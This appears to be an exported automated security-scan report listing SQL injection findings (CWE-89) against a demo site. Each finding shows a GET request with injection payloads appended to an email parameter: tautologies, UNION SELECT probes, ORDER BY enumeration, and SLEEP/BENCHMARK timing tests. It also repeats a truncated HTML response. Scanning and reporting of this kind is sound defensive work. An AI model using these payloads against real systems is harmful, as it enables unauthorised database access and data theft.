\nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #785\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #786\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #787\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #788\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #789\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #790\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #791\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #792\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioOR x=y#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #793\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 31337\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #794\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #795\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #796\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #797Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #798\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html 